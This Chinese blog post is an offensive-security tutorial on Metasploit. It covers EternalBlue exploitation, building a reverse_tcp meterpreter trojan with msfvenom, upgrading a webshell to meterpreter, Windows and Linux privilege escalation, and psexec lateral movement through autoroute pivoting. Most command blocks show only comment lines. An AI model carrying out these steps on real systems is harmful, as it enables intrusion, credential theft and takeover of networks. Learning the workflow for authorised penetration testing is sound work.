0x01 原理简述
作者把提权到横向全都封装好了,你只需要在它原生的命令行做操作就行了
本工具从linux到windows均可使用并提权,
0x02 核心专有名词解析
在 MSF 的终端里,你必须理解以下三个核心组件的组合逻辑:
Exploit
作用:利用目标系统存在的某个具体漏洞(如 MS17-010 SMB 溢出漏洞),在目标内存中撕开一个口子。
示例:
exploit/windows/smb/ms17_010_eternalblue
Payload
作用:口子撕开后,实际在目标机器上执行的恶意代码(通常是一个反弹 Shell)。
示例:
windows/x64/meterpreter/reverse_tcp
Meterpreter
- 作用:MSF 独创的高级纯内存 Shell。比普通的 CMD/Bash 强大无数倍,自带抓密码、键盘记录、内网路由穿透等功能。
0x03 靶机一键击杀标准工作流 (SOP)
假设你已经用 Nmap 扫出某台内网机器 <目标内网IP> 存在 MS17-010 漏洞。打开你的 Ubuntu 终端,执行以下连招:
Step 1: 启动
1 | # 启动 MSF 控制台 (-q 代表安静模式,不显示花哨的字符画启动图) |
Step 2: 检索漏洞exp
1 | # 搜索漏洞关键字 |
Step 3: 配置攻击参数
1 | # 查看当前模块需要配置哪些参数 (重点看 Required 栏为 yes 的项) |
Step 4: 运行
1 | #执行攻击 |
- 结果:如果屏幕最后输出
WIN并且出现meterpreter >提示符,说明漏洞利用成功,你已接管该机器。
0x05 联动打法:从普通 WebShell 升级到 Meterpreter
真实场景:你没有用 MSF 的漏洞模块,而是通过网页上传漏洞拿到了一个蚁剑/冰蝎的 WebShell。此时你想把这个普通的 WebShell 升级成 MSF 的 meterpreter 以便后续提权。
Step 1: 制造独立弹头 (msfvenom)
不要进 msfconsole,直接在你的 Ubuntu 终端里用 MSF 的“兵工厂”命令生成一个木马文件:
1 | # 生成 Windows 平台的 meterpreter 木马 (假设你的 Ubuntu IP 是 10.243.120.200) |
Step 2: 开启万能接收器 (multi/handler)
进入 MSF 控制台,启动一个专门用来“接客”的监听模块:
1 | msfconsole -q |
Step 3: 在 WebShell 中引爆弹头
用蚁剑/冰蝎把刚才生成的
shell.exe上传到靶机的C:\Windows\Temp\目录下。在蚁剑的虚拟终端里执行它:
C:\Windows\Temp\shell.exe。切回你的 Ubuntu 窗口,你会发现万能接收器成功捕获连接,尊贵的
meterpreter >提示符出现了
0x06 双端本地提权
拿到普通的 meterpreter 会话后,如果权限不够(比如只是个 Web 用户),MSF 内置了极其强大的提权库,全平台通杀。
首先,把当前的会话挂起到后台: meterpreter > background (记住返回的 Session ID,假设是 1)
方案 A:Windows 提权
1 | # 尝试一键智能提权 (返回 meterpreter 后执行) |
方案 B:Linux 提权
1 | # 使用著名的 DirtyCow (脏牛) 或者其他 Linux 本地提权模块 |
0x07 MSF 横向移动实战演练 (Lateral Movement)
这是 MSF 真正的灵魂所在! 假设你已经拿下了处于边界的“跳板机 A”,现在你想打处于内网深处的“靶机 B (192.168.10.20)”。
第一步:把跳板机变成“路由器” (Autoroute)
在跳板机 A 的 meterpreter 会话中,将其挂起到后台,然后添加自动路由:
1 | # 假设跳板机 A 的会话是 Session 1 |
- 原理解析:这步做完后,你 MSF 发出的所有打向
192.168.10.x的攻击流量,都会自动钻进 Session 1 对应的跳板机里,然后从跳板机的内网网卡发出去。
第二步:隔山打牛 (直接攻击靶机 B)
现在 MSF 已经和内网通了。如果之前在跳板机 A 上抓到了管理员的账密/哈希,我们直接使用 MSF 的 psexec 模块进行横向击杀!
1 | # 加载横向移动专用的 psexec 模块 |
战果:执行成功后,你会在 MSF 里得到一个属于内网靶机 B 的全新 meterpreter 会话!你甚至都没碰过 Chisel 和 Proxychains,MSF 帮你把底层网络全搞定了。
小tips
如果你已经用了 Proxychains + Chisel 挂了全局代理,启动 msfconsole 时流量可能异常。建议在 MSF 内部使用 setg Proxies socks5:127.0.0.1:1080 进行框架级代理配置。
- 本文链接: http://example.com/2026/03/21/ISW/内网渗透与横向移动/内网横向5_横向全自动工具/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
欢迎关注我的其它发布渠道